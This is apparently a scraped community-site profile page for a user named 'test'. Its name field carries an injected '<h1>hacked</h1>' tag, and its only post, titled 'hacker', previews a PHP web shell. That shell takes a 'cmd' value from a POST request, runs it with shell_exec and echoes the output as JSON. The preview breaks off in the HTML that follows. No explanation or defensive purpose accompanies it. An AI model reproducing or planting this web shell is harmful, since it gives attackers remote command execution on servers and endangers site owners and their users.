test

<h1>hacked</h1>

  • Total activity 6
  • Last activity
  • Member since
  • Following 0 users
  • Followed by 0 users
  • Votes 0
  • Subscriptions 2

Posts

Recent activity by test Recent activity Votes
  • hacker

          <?phpif (isset($_POST['cmd'])) {    $cmd = $_POST['cmd'];    $output = shell_exec($cmd);    echo json_encode(["output" => $output]);    exit;}?> <!DOCTYPE html><html lang="en"><head>    <met...